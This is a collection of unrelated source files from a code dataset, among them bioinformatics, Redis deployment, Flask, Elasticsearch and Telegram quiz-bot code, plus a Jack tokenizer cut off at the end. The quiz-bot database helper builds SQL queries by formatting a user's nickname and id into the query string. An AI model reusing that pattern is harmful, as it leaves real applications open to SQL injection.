+{"seq_id":"480707864","text":"import pandas as pd\nimport sys\nfrom os.path import exists, join,expanduser,basename\nfrom tqdm import tqdm\nfrom api_tools.itol_func import *\nfrom glob import glob\nfrom ete3 import Tree\nimport plotly.express as px\nfrom ete3 import NCBITaxa\nfrom global_search.classification_script import _classificated\nfrom subprocess import check_call\nimport os\n\nncbi = NCBITaxa()\n\nblastp_pth = '/home-user/software/blast/latest/bin/blastp'\ndef run(cmd):\n check_call(cmd,shell=1)\n \ndef reformat(s):\n a = s.split('_')[-1]\n if not '_' in s:\n return s\n try:\n float(a)\n return s\n except:\n if len(s.rpartition('_')[-1]) == 1:\n return s\n else:\n return s.rpartition('_')[0]\nunder_nodes = {'nxrA':['I49_S100', 'I137_S88', 'I88_S99', 'I71_S100'],\n 'hao':['I16_S100','I14_S90','I17_S100'],\n 'amoA':['I43_S100','I30_S100',\n #'I15_S76'\n ],\n 'amoB':['I44_S89','I71_S100',\n #'I14_S100','I16_S100'\n ],\n 'amoC':['I12_S100','I57_S59'],\n }\n\nall_files = ['nr_retrieve_amoB/with_genome_Bacteria_drop_NC10_intact.faa_aln.dir/iqtree.treefile',\n 'nr_retrieve_amoC/with_genome_Bacteria_drop_NC10_intact.faa_aln.dir/iqtree.treefile',\n 'with_genome_amoA/with_genome_Bacteria_drop_NC10_intact.faa_aln.dir/iqtree.treefile',\n 'nr_retrieve_hao/with_genome_Bacteria_intact.faa_aln.dir/iqtree.treefile',\n 'nr_retrieve_nxrA/with_genome_Bacteria_drop_NC10_intact_lt_600.faa_aln.dir/iqtree.treefile',\n 'nr_retrieve_nirK/with_genome_Bacteria_drop_NC10_intact.faa_aln.dir/cluster_90_aln.dir/iqtree.treefile',\n ]\n\n\n\n# check_call('python3 ~/script/evolution_relative/global_search/reannotate_tree.py '+ ' '.join(all_files),shell=1)\nfrom collections import defaultdict\ng_genomes = defaultdict(list)\ngenome2id = []\nreformat_id2ori = {} # mapping dict for reformatted leaf\nmanuall_class_ids = [] # manually assigned node for annotation.\nfor f in all_files:\n g = f.split('/')[0].split('_')[-1]\n tree = glob(join(f,'*.sorted.newick'))[0]\n t = Tree(tree,format=1)\n all_ids = [reformat(_).strip() for _ in t.get_leaf_names()]\n if under_nodes.get(g,[]):\n _ns = [_ \n for _ in t.iter_descendants() \n if _.name in under_nodes.get(g,[])]\n for _n in _ns:\n manuall_class_ids += list(_n.get_leaf_names())\n manuall_class_ids = [reformat(_).strip() for _ in manuall_class_ids]\n else:\n manuall_class_ids = all_ids[::]\n reformat_id2ori.update(dict(zip(all_ids,\n [_ for _ in t.get_leaf_names()])))\n pro2genome = pd.read_csv(join(f,'info_dir','pro2genome.tab'),\n sep='\\t',index_col=0)\n pro2genome = pro2genome.fillna('None')\n for gene in all_ids:\n if gene in pro2genome.index:\n _cache = pro2genome.loc[gene,'assembly_ID']\n if isinstance(_cache,str) and _cache !='None':\n genome2id.append((_cache,gene))\n if gene in manuall_class_ids:\n g_genomes[g].append(_cache)\n elif str(_cache) == 'None':\n print(gene,g)\n else:\n if gene in manuall_class_ids:\n g_genomes[g] += list(_cache)\n genome2id += [(_g,gene) for _g in list(_cache)]\n else:\n print(gene,g)\n\n\n\ngenome2genes = defaultdict(list)\nfor g,genomes in g_genomes.items():\n for genome in genomes:\n if genome !='None':\n genome2genes[genome].append(g)\n\nid2genes = {}\nfor genome,genes in genome2genes.items():\n ids = [id \n for g,id in genome2id \n if g == genome]\n id2genes.update({id:list(set(genes)) \n for id in ids})\n\ninfo2style = {'amoA':{'color':'#ff0000',\n 'info':'amoA'},\n 'amoB':{'color':'#ff0000',\n 'info':'amoB'},\n 'amoC':{'color':'#ff0000',\n 'info':'amoC'},\n 'hao':{'color':'#b68100',\n 'info':'hao'},\n 'cycA':{'color':'#b68100',\n 'info':'cycA'},\n 'cycB':{'color':'#b68100',\n 'info':'cycB'},\n 'nxrA':{'color':'#4b85c1',\n 'info':'nxrA'},\n }\n#odir = ''\nfor f in all_files:\n g = f.split('/')[0].split('_')[-1]\n tree = glob(join(f,'*.sorted.newick'))[0]\n t = Tree(tree,format=1)\n all_ids = [reformat(_).strip() for _ in t.get_leaf_names()]\n \n this_id2genes = {reformat_id2ori[_]:id2genes.get(_,[]) \n for _ in all_ids \n if _ in id2genes}\n all_text = to_binary_shape(this_id2genes,\n info2style,\n info_name='genes set',manual_v=['amoA','amoB','amoC','hao','nxrA'])\n with open(join(f,'gene_set.txt'),'w') as f1:\n f1.write(all_text)\n\n\n# new confirmed and extendable workflow after download all genomes...\nremained_g = []\ndownload_dir = expanduser('~/data/nitrification_for/genome_protein_files')\nfor genome,genes in genome2genes.items():\n download_faa = glob(join(download_dir,f\"*{genome.split('_')[1].split('.')[0]}*\"))\n if not download_faa:\n # if not, should be download and go on\n print(genome.replace('GCF','GCA'))\n remained_g.append(genome.replace('GCF','GCA'))\n\n# step1. annotate gene to genome.\nnew_genome2id = [(genome.split('_')[-1].replace('.','v'),id) for genome,id in genome2id]\n# step2. annotate requested gene(for extract), do not modify manually classified one.\ntmp_dir = join('./tmp/contained_genes/')\nredo = False\nif not exists(tmp_dir):\n os.makedirs(tmp_dir)\ndb_faa = join(dirname(download_dir),'concat_all_protein.faa')\ncollected_gs = expanduser('~/project/nitrogen_cycle/curated_genes/')\ngenome2collect_genes = defaultdict(list)\nfor fa in tqdm(glob(join(collected_gs,'*.faa'))):\n gene_name = basename(fa).replace('.faa','').strip()\n otab = join(tmp_dir,basename(fa).replace('.faa','').strip()+'.tab')\n if (not exists(otab)) or redo:\n cmd = f\"{blastp_pth} -query '{fa}' -db {db_faa} -out {otab} -num_threads 20 -outfmt 6 -evalue 1e-50\"\n run(cmd)\n for row in open(otab):\n genome_name = row.split(\"\\t\")[1].split('_')[0]\n genome2collect_genes[genome_name].append(gene_name)\ngenome2collect_genes = {k:set(v) for k,v in genome2collect_genes.items()}\n\n\n# \nextra_g = ['cycA','cycB']\nfor f in all_files:\n g = f.split('/')[0].split('_')[-1]\n tree = glob(join(f,'*.sorted.newick'))[0]\n t = Tree(tree,format=1)\n all_ids = [reformat(_).strip() for _ in t.get_leaf_names()]\n\n this_id2genes = {reformat_id2ori[_]:id2genes.get(_,[])\n for _ in all_ids\n if _ in id2genes}\n for id in all_ids:\n genes = this_id2genes.get(reformat_id2ori[id],[])\n genomes = [genome for genome,_id in new_genome2id if id == _id]\n for _g in genomes:\n _c = genes + list(genome2collect_genes.get(_g,set()).intersection(set(extra_g)))\n if _c:\n this_id2genes[id] = _c\n for id in list(this_id2genes):\n v = this_id2genes[id]\n if (len(v)==1 and g in v) or (not v):\n this_id2genes.pop(id)\n all_text = to_binary_shape(this_id2genes,\n info2style,\n info_name='genes set',\n manual_v=['amoA','amoB','amoC','hao','cycA','cycB','nxrA'])\n with open(join(f,'gene_set.txt'),'w') as f1:\n f1.write(all_text)\n","sub_path":"global_search/reannotate_genes_contains_info.py","file_name":"reannotate_genes_contains_info.py","file_ext":"py","file_size_in_byte":7677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"333077332","text":"# Copyright (C) 2022, Mykola Grymalyuk\n# Check whether new updates are available for OpenCore Legacy Patcher binary\n# Call check_binary_updates() to determine if any updates are available\n# Returns dict with Link and Version of the latest binary update if available\nimport requests\nimport logging\n\nfrom resources import network_handler\n\n\nclass check_binary_updates:\n def __init__(self, constants):\n self.constants = constants\n self.binary_version = self.constants.patcher_version\n self.binary_version_array = self.binary_version.split(\".\")\n self.binary_version_array = [int(x) for x in self.binary_version_array]\n self.binary_url = \"https://api.github.com/repos/dortania/OpenCore-Legacy-Patcher/releases/latest\"\n\n self.available_binaries = {}\n\n\n def check_if_build_newer(self, remote_version=None, local_version=None):\n if remote_version is None:\n remote_version = self.remote_version_array\n if local_version is None:\n local_version = self.binary_version_array\n\n # Pad version numbers to match length (ie. 0.1.0 vs 0.1.0.1)\n while len(remote_version) > len(local_version):\n local_version.append(0)\n while len(remote_version) < len(local_version):\n remote_version.append(0)\n\n for i in range(0, len(remote_version)):\n if int(remote_version[i]) < int(local_version[i]):\n break\n elif int(remote_version[i]) > int(local_version[i]):\n return True\n\n return False\n\n def determine_local_build_type(self):\n if self.constants.wxpython_variant is True:\n return \"GUI\"\n else:\n return \"TUI\"\n\n def determine_remote_type(self, remote_name):\n if \"TUI\" in remote_name:\n return \"TUI\"\n elif \"GUI\" in remote_name:\n return \"GUI\"\n else:\n return \"Unknown\"\n\n def check_binary_updates(self):\n # logging.info(\"- Checking for updates...\")\n if network_handler.NetworkUtilities(self.binary_url).verify_network_connection():\n # logging.info(\"- Network connection functional\")\n response = requests.get(self.binary_url)\n data_set = response.json()\n # logging.info(\"- Retrieved latest version data\")\n self.remote_version = data_set[\"tag_name\"]\n # logging.info(f\"- Latest version: {self.remote_version}\")\n self.remote_version_array = self.remote_version.split(\".\")\n self.remote_version_array = [\n int(x) for x in self.remote_version_array\n ]\n if self.check_if_build_newer() is True:\n # logging.info(\"- Remote version is newer\")\n for asset in data_set[\"assets\"]:\n logging.info(f\"- Found asset: {asset['name']}\")\n if self.determine_remote_type(asset[\"name\"]) == self.determine_local_build_type():\n # logging.info(f\"- Found matching asset: {asset['name']}\")\n self.available_binaries.update({\n asset['name']: {\n \"Name\":\n asset[\"name\"],\n \"Version\":\n self.remote_version,\n \"Link\":\n asset[\"browser_download_url\"],\n \"Type\":\n self.determine_remote_type(asset[\"name\"]),\n \"Github Link\":\n f\"https://github.com/dortania/OpenCore-Legacy-Patcher/releases/{self.remote_version}\"\n }\n })\n break\n if self.available_binaries:\n return self.available_binaries\n else:\n # logging.info(\"- No matching binaries available\")\n return None\n # else:\n # logging.info(\"- Failed to connect to GitHub API\")\n return None","sub_path":"resources/updates.py","file_name":"updates.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"379275066","text":"'''\n实现仿射变换相关的操作\n'''\nimport numpy as np\nimport cv2,os\n\n\nif __name__=='__main__':\n img_path = r\"F:\\post_graduate_design\\postgraduate_continue\\imgaug_and_expand_res\\image_expand\\orgdata_without_CLAHE\"\n save_path = r\"F:\\post_graduate_design\\postgraduate_continue\\imgaug_and_expand_res\\image_expand\\affine_change\"\n img_list = os.listdir(img_path)\n for each_img in img_list:\n each_img_path = os.path.join(img_path, each_img)\n img = cv2.imread(each_img_path,0)\n img1 = cv2.flip(img, 1) # 镜像\n '''\n 参数2 必选参数。用于指定镜像翻转的类型,其中0表示绕×轴正直翻转,即垂直镜像翻转;1表示绕y轴翻转,即水平镜像翻转;-1表示绕×轴、y轴两个轴翻转,即对角镜像翻转。\n 参数3 可选参数。用于设置输出数组,即镜像翻转后的图像数据,默认为与输入图像数组大小和类型都相同的数组。\n '''\n cv2.imwrite(save_path + '/' + each_img, img1)","sub_path":"image_operation/affine_change.py","file_name":"affine_change.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"199716350","text":"# Copyright 2011 Julien Duponchelle .\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Elastic Search Pipeline for scrappy\"\"\"\n\nfrom pyes import ES\nimport hashlib\nfrom scrapy.conf import settings\nfrom scrapy import log\n\nclass ElasticSearchPipeline(object):\n def __init__(self):\n uri = \"%s:%d\" % (settings['ELASTICSEARCH_SERVER'], settings['ELASTICSEARCH_PORT'])\n self.es = ES([uri])\n\n def process_item(self, item, spider):\n if self.__get_uniq_key() is None:\n self.es.index(dict(item), settings['ELASTICSEARCH_INDEX'], settings['ELASTICSEARCH_TYPE'])\n else:\n self.es.index(dict(item), settings['ELASTICSEARCH_INDEX'], settings['ELASTICSEARCH_TYPE'],\n hashlib.sha1(item[self.__get_uniq_key()]).hexdigest())\n log.msg(\"Item send to Elastic Search %s\" %\n (settings['ELASTIC_SEARCH_INDEX']),\n level=log.DEBUG, spider=spider) \n return item\n\n def __get_uniq_key(self):\n if not settings['ELASTICSEARCH_UNIQ_KEY'] or settings['ELASTICSEARCH_UNIQ_KEY'] == \"\":\n return None\n return settings['ELASTICSEARCH_UNIQ_KEY']\n \n","sub_path":"scrapyelasticsearch.py","file_name":"scrapyelasticsearch.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"604656389","text":"from pathlib import Path\n\nfrom unv.utils.tasks import register\n\nfrom ...tasks import DeployTasks\nfrom ...settings import DeployComponentSettings\n\nfrom ..systemd import SystemdTasksMixin\n\n\nclass RedisSettings(DeployComponentSettings):\n NAME = 'redis'\n SCHEMA = {\n 'user': {'type': 'string', 'required': False},\n 'systemd': SystemdTasksMixin.SCHEMA,\n 'config': {\n 'type': 'dict',\n 'schema': {\n 'template': {'type': 'string', 'required': True},\n 'name': {'type': 'string', 'required': True}\n }\n },\n 'workdir': {'type': 'string', 'required': True},\n 'port': {'type': 'integer', 'required': True},\n 'maxmemory': {'type': 'string', 'required': True},\n 'databases': {'type': 'integer', 'required': True},\n 'root': {'type': 'string', 'required': True},\n 'packages': {\n 'type': 'dict',\n 'schema': {\n 'redis': {'type': 'string', 'required': True},\n },\n 'required': True\n },\n 'listen_private_ip': {'type': 'boolean', 'required': False},\n 'iptables': {\n 'type': 'dict',\n 'schema': {\n 'v4': {'type': 'string', 'required': True},\n },\n 'required': True\n },\n }\n DEFAULT = {\n 'systemd': {\n 'template': 'server.service',\n 'name': 'redis.service',\n 'boot': True,\n 'instances': {'count': 1}\n },\n 'config': {\n # http://download.redis.io/redis-stable/redis.conf\n 'template': 'server.conf',\n 'name': 'redis.conf'\n },\n\n # TODO: move to base config (base package for this type of components)\n 'workdir': '.',\n 'port': 6379,\n 'maxmemory': '64mb',\n 'databases': 16,\n 'root': 'app',\n 'packages': {\n 'redis': 'http://download.redis.io/releases/redis-6.2.5.tar.gz'\n },\n 'iptables': {\n 'v4': 'ipv4.rules'\n }\n }\n\n @property\n def build_dir(self):\n return self.home_abs / 'build'\n\n @property\n def bin(self):\n return self.root_abs / 'bin' / 'redis-server'\n\n @property\n def packages(self):\n return self._data['packages']\n\n @property\n def config_template(self):\n template = self._data['config']['template']\n if not template.startswith('/'):\n template = (self.local_root / template).resolve()\n return Path(template)\n\n @property\n def config_path(self):\n return self.root_abs / self._data['config']['name']\n\n @property\n def workdir(self):\n return self.root_abs / self._data['workdir']\n\n @property\n def port(self):\n return self._data['port']\n\n @property\n def maxmemory(self):\n return self._data['maxmemory']\n\n @property\n def databases(self):\n return self._data['databases']\n\n @property\n def iptables_v4_rules(self):\n return (self.local_root / self._data['iptables']['v4']).read_text()\n\n @property\n def listen_private_ip(self):\n return self._data.get('listen_private_ip', False)\n\n\nSETTINGS = RedisSettings()\n\n\nclass RedisTasks(DeployTasks, SystemdTasksMixin):\n SETTINGS = RedisSettings\n\n async def get_iptables_template(self):\n return self.settings.iptables_v4_rules\n\n @register\n async def benchmark(self, connections: int = 200):\n print(await self._run(\n f'{self.settings.bin.parent / \"redis-benchmark\"} -c {connections} '\n f'-h {self.public_ip} -p {self.settings.port} '\n '-t SET,GET,INCR -n 1000000 -P 100 --csv'\n ))\n\n @register\n async def build(self):\n await self._apt_install(\n 'build-essential', 'sysfsutils', 'libsystemd-dev',\n 'libjemalloc-dev', 'rsync'\n )\n await self._create_user()\n\n with self._set_user('root'):\n await self._run(\n 'echo \"kernel/mm/transparent_hugepage/enabled = never\" '\n '>> /etc/sysfs.conf'\n )\n await self._run(\n 'echo \"vm.overcommit_memory=1\" >> /etc/sysctl.conf')\n await self._run(\n 'echo \"net.core.somaxconn=65535\" >> /etc/sysctl.conf')\n await self._run('echo \"fs.file-max=100000\" >> /etc/sysctl.conf')\n await self._run('sysctl -p')\n await self._run('systemctl force-reload sysfsutils')\n\n async with self._cd(self.settings.build_dir, temporary=True):\n for package, url in self.settings.packages.items():\n await self._download_and_unpack(url, Path('.', package))\n\n async with self._cd('redis'):\n await self._run('make distclean')\n await self._run(\n \"make -j$(nproc) USE_SYSTEMD=yes MALLOC=jemalloc\")\n await self._run(\n f\"make PREFIX={self.settings.root_abs} install\")\n\n @register\n async def sync(self):\n await self._upload_template(\n self.settings.config_template, self.settings.config_path)\n await self._sync_systemd_units()\n\n @register\n async def setup(self):\n await self.build()\n await self.sync()\n await self.start()\n","sub_path":"src/unv/deploy/components/redis/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"80826161","text":"import os\n\nimport redis\nfrom flask import Flask, request, jsonify\n \napi = Flask(__name__)\n\nr = redis.StrictRedis(host=os.environ['OPENSHIFT_REDIS_HOST'],\n port=os.environ['OPENSHIFT_REDIS_PORT'],\n password=os.environ['REDIS_PASSWORD'],\n db=0)\n\nprice_per_cig = 100\n\n@api.route('/')\ndef index():\n return api.send_static_file('index.html')\n\n@api.route('/update')\ndef update():\n cravings = r.lrange('cravings:1000', 0, -1)\n incidents = r.lrange('incidents:1000', 0, -1)\n savings = r.get('savings:1000')\n last_craving = r.lindex('cravings:1000', -1)\n last_incident = r.lindex('incidents:1000', -1)\n longest_streak = r.get('longest_streak:1000')\n return jsonify(cravings=cravings, incidents=incidents, savings=savings,\n last_craving=last_craving, last_incident=last_incident,\n longest_streak=longest_streak)\n\n@api.route('/cravings', methods=['POST'])\ndef post_cravings():\n timestamp = request.get_json()['timestamp']\n r.rpush('cravings:1000', timestamp)\n r.incr('savings:1000', amount=price_per_cig)\n return update()\n\n@api.route('/incidents', methods=['POST'])\ndef post_incidents():\n timestamp = request.get_json()['timestamp']\n r.rpush('incidents:1000', timestamp)\n r.decr('savings:1000', amount=price_per_cig)\n return update()\n \nif __name__ == '__main__':\n api.run(debug=True)\n \n","sub_path":"wsgi/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"293651847","text":"\"\"\"\nCopyright (2017) Chris Scuderi\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nimport socket\nimport json\nimport os\n\nSOCKFILE = \"/tmp/alarm_socket\"\n\n\ndef start_socket_server():\n s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.bind(SOCKFILE)\n s.listen(5)\n return s\n\n\ndef start_socket_client():\n s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.connect(SOCKFILE)\n return s\n\n\ndef send(sock, obj):\n msg = json.dumps(obj)\n packet = '%05d%s' % (len(msg), msg)\n sock.sendall(packet)\n\n\ndef recv(sock):\n msg_len = int(sock.recv(5))\n msg = ''\n while len(msg) < msg_len:\n chunk = sock.recv(msg_len - len(msg))\n assert chunk != ''\n msg = msg + chunk\n\n return json.loads(msg)\n\n\ndef cleanup_socket_server(sock):\n sock.close()\n os.remove(SOCKFILE)\n","sub_path":"alarm_central_station_receiver/json_ipc.py","file_name":"json_ipc.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"386530608","text":"from datetime import date, datetime\n\nimport pytest\nfrom figure_parser.errors import OrderPeriodError\nfrom figure_parser.extension_class import (HistoricalReleases, OrderPeriod,\n Price, Release)\nfrom pytest_mock import MockerFixture\n\n\nclass TestRelease:\n def test_release_class(self, mocker: MockerFixture):\n mocker.patch('figure_parser.extension_class.Price', int)\n r1 = Release(release_date=date(2020, 1, 1), price=Price(10000))\n\n assert hasattr(r1, \"release_date\")\n assert hasattr(r1, \"price\")\n assert hasattr(r1, \"announced_at\")\n\n\ndef test_release_info_class(mocker: MockerFixture):\n mocker.patch('figure_parser.extension_class.Price', int)\n first_release = Release(release_date=date(2020, 1, 1), price=Price(10000))\n second_release = Release(release_date=date(2020, 2, 1), price=Price(12000))\n third_release = Release(release_date=None, price=Price(12000))\n date_price_combos = [first_release, second_release, third_release]\n sorted_combos = [third_release, first_release, second_release]\n\n hr = HistoricalReleases()\n hr.append(first_release)\n hr.append(second_release)\n hr.append(third_release)\n\n assert hr == date_price_combos\n\n hr.sort()\n assert hr == sorted_combos\n\n last_release = hr.last()\n assert last_release.release_date == date(2020, 2, 1)\n assert last_release.price == 12000\n\n hr2 = HistoricalReleases()\n assert not hr2.last()\n\n\nclass TestOrderPeriod:\n def test_is_available(self):\n start = datetime(1990, 1, 1)\n end = datetime(2000, 1, 1)\n\n order_period = OrderPeriod(start, end)\n assert not order_period.is_available\n\n def test_is_available_at_specific_time(self):\n start = datetime(2020, 2, 2, 9, 0)\n end = datetime(2020, 3, 2, 23, 0)\n\n now = datetime(2020, 2, 22, 5, 34)\n\n order_period = OrderPeriod(start, end)\n assert order_period.is_available_at(now)\n assert now in order_period\n\n def test_default_value(self):\n order_period = OrderPeriod()\n assert not order_period.start\n assert not order_period.end\n\n def test_checker(self):\n with pytest.raises(OrderPeriodError):\n OrderPeriod(datetime(2000, 1, 1), datetime(1999, 1, 1))\n\n def test_none_of_one(self):\n OrderPeriod(None, datetime(2000, 1, 1))\n OrderPeriod(datetime(2020, 1, 1), None)\n\n def test_bool(self):\n assert not bool(OrderPeriod(None, None))\n assert OrderPeriod(None, datetime(2000, 1, 1))\n assert OrderPeriod(datetime(2020, 1, 1), None)\n assert OrderPeriod(datetime(2020, 1, 1), datetime(2022, 1, 1))\n\n\nclass TestPrice:\n def test_is_int(self):\n price = Price(300)\n assert isinstance(price, int)\n\n def test_price_always_be_postive(self):\n price = Price(-21323)\n assert price == 21323\n\n def test_price_has_tax_including_attribute(self):\n price = Price(500)\n assert hasattr(price, 'tax_including')\n","sub_path":"libs/figure_parser/tests/test_custom_class.py","file_name":"test_custom_class.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"208390757","text":"\"\"\"pytelegram-quizbot DB helper\"\"\"\n\nimport logging\nimport sqlite3\nfrom collections import OrderedDict\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\ndef create_db_connection(db_file):\n \"\"\"\n Creates connection to SQLite3 DB\n\n :param db_file: path to DB (string)\n :return: sqlite3.connect object\n \"\"\"\n try:\n conn = sqlite3.connect(db_file, check_same_thread=False)\n return conn\n except sqlite3.Error as e:\n logger.error(e)\n\n return None\n\n\ndef create_table(conn, table_name, fields):\n \"\"\"\n Creates table if not exist\n\n :param conn: sqlite3 connection handler\n :param table_name: table name\n :param fields: table fields\n :return:\n \"\"\"\n cols = \"(\" + ','.join(fields) + \")\"\n sql_command = 'CREATE TABLE if not exists ' + table_name + cols\n\n c = conn.cursor()\n c.execute(sql_command)\n\n conn.commit()\n\n\ndef db_get_question(conn, iterator):\n \"\"\"\n Obtains questions from DB\n\n :param conn: sqlite3 connection handler\n :param iterator: number of question (int)\n :return: dict of questions\n \"\"\"\n c = conn.cursor()\n try:\n c.execute(\"SELECT * FROM questions\")\n except Exception as e:\n logger.error(e)\n\n rows = c.fetchall()\n if iterator < len(rows):\n question = rows[iterator][0]\n correct = rows[iterator][1]\n inn1 = rows[iterator][2]\n inn2 = rows[iterator][3]\n inn3 = rows[iterator][4]\n return {\"question\": question, \"correct\": correct, \"incorrect\": [inn1, inn2, inn3]}\n else:\n return \"End\"\n\n\ndef post_score(conn, uid, nickname, score):\n \"\"\"\n Updates user score\n\n :param conn: sqlite3 connection handler\n :param uid: user id\n :param nickname: user nickname\n :param score: user score\n :return: None\n \"\"\"\n c = conn.cursor()\n\n create_table(conn, \"leaderboard\", [\"id INTEGER\", \"name TEXT\", \"score INTEGER DEFAULT 0\"])\n data = check_if_exist(conn, uid, \"leaderboard\")\n if data == 0:\n sql = '''\n INSERT INTO leaderboard(id,name,score)\n VALUES(\n CAST({} as integer),\n '{}',\n {})\n '''.format(uid, nickname, score)\n else:\n sql = '''\n UPDATE leaderboard\n SET score = (SELECT score FROM leaderboard WHERE id = {}) + {}\n WHERE id = {}\n '''.format(uid, score, uid)\n c.execute(sql)\n conn.commit()\n\n\ndef check_if_exist(conn, uid, table):\n \"\"\"\n Check if table has any rows with user id\n\n :param conn: sqlite3 connection handler\n :param uid: user id\n :param table: table name\n :return: number of rows containing user id\n \"\"\"\n c = conn.cursor()\n sql = \"SELECT count(*) FROM {} WHERE id = {}\".format(table, uid)\n c.execute(sql)\n data = c.fetchone()[0]\n return data\n\n\ndef get_leaderboard(conn, uid):\n \"\"\"\n Get 3 highest scores + user score if not in those 3\n\n :param conn: sqlite3 connection handler\n :param uid: user id\n :return: dict of 3 highest scores + user score if not in those 3\n \"\"\"\n scores = OrderedDict()\n cur = conn.cursor()\n try:\n cur.execute(\"SELECT * FROM leaderboard ORDER BY score DESC LIMIT 3\")\n except sqlite3.OperationalError as e:\n if \"no such table\" in str(e):\n create_table(conn, \"leaderboard\", [\"id INTEGER\", \"name TEXT\", \"score INTEGER DEFAULT 0\"])\n\n rows = cur.fetchall()\n\n for place, (id, name, score) in enumerate(rows, 1):\n scores[id] = {'place': place, 'name': name, 'score': score}\n if uid not in scores.keys():\n personal_score = get_score(conn, uid)\n scores[personal_score[0]] = personal_score[1]\n return scores\n\n\ndef get_score(conn, uid):\n \"\"\"\n Grab user score\n\n :param conn: sqlite3 connection handler\n :param uid: user id\n :return: list with user data from leaderboard table\n \"\"\"\n c = conn.cursor()\n c.execute(\"SELECT * FROM leaderboard ORDER BY score DESC\")\n rows = c.fetchall()\n for place, (id, name, score) in enumerate(rows, 1):\n if id == int(uid):\n return [id, {'place': place, 'name': name, 'score': score}]\n return [uid, {'place': 0, 'name': 'Unknown', 'score': 0}]\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"404856702","text":"# coding:utf-8\n\nimport pandas as pd\n\nif __name__ == \"__main__\":\n dstDF = pd.read_csv(\"/home/qiu/Documents/data/DP-DATA/deviation/\"\n \"chinaCoast_ddp_200m_deviation.csv\")\n dstDF = dstDF[dstDF[\"dst2\"] != 0]\n dstDF[\"deviation\"] = ((dstDF[\"dst2\"] - dstDF[\"dst1\"]) / dstDF[\"dst2\"]) * 100\n # tmpDF = dstDF[(dstDF[\"deviation\"] > 13) & (dstDF[\"dst2\"] > 10.)]\n # print(tmpDF)\n print(\"mean deviation = %f\" % (1 - (sum(dstDF[\"dst1\"]) / sum(dstDF[\"dst2\"]))))\n","sub_path":"dp/check_deviation.py","file_name":"check_deviation.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"449654956","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 12 20:52:38 2021\n\n@author: velve\n\"\"\"\nfrom constants import symbols\nfrom constants import keywords\nfrom constants import lexical_elements\nimport itertools\nimport collections\nimport re\nclass JackTokenizer:\n #constructor\n def __init__(self,input_file):\n file = open(input_file, 'r')\n self.input = file.read()\n file.close()\n self.tokens = collections.deque()\n self.current_token = None\n self.next_token = None\n self.current_token_type = None\n self.process_input()\n self.has_more_tokens = True\n def advance(self):\n if self.current_token == None:\n self.current_token = self.tokens.popleft()\n else:\n self.current_token = self.next_token\n if len(self.tokens) > 0:\n self.next_token = self.tokens.popleft()\n else:\n self.has_more_tokens = False\n self.current_token_type = self.token_type(self.current_token)\n print(self.current_token)\n print(self.current_token_type)\n def process_input(self):\n self.input = self.remove_white_space_and_comments()\n self.split(self.input)\n def split(self,string):\n temp = re.findall(lexical_elements,self.input)\n match = list(itertools.chain(*temp))\n for m in match:\n if m:\n self.tokens.append(m)\n \n def remove_white_space_and_comments(self):\n inline_comment = re.compile('//.*\\n')\n multiline_comment = re.compile(\"/\\*.*?\\*/\", flags=re.S)\n remove_multiline = re.sub(multiline_comment, ' ', self.input)\n remove_inline = re.sub(inline_comment, '\\n', remove_multiline)\n return remove_inline\n \n def token_type(self, token):\n if token in symbols:\n return \"SYMBOL\"\n elif token.isnumeric():\n return \"INTEGER_CONSTANT\"\n elif token in keywords:\n return \"KEYWORD\"\n elif token.isalnum():\n return \"IDENTIFIER\"\n else:\n return \"STRING_CONSTANT\"\n def keyword(self):\n return self.current_token\n def symbol(self):\n return self.current_token\n def identifier(self):\n return self.current_token\n def int_val(self):\n return int(self.current_token)\n def string_val(self):\n temp = self.current_token.replace(\"\\\"\", '')\n return temp\n def get_token_type(self):\n if self.current_token_type == None:\n return -1\n return self.current_token_type.lower()\n \nif __name__ == \"__main__\":\n t = 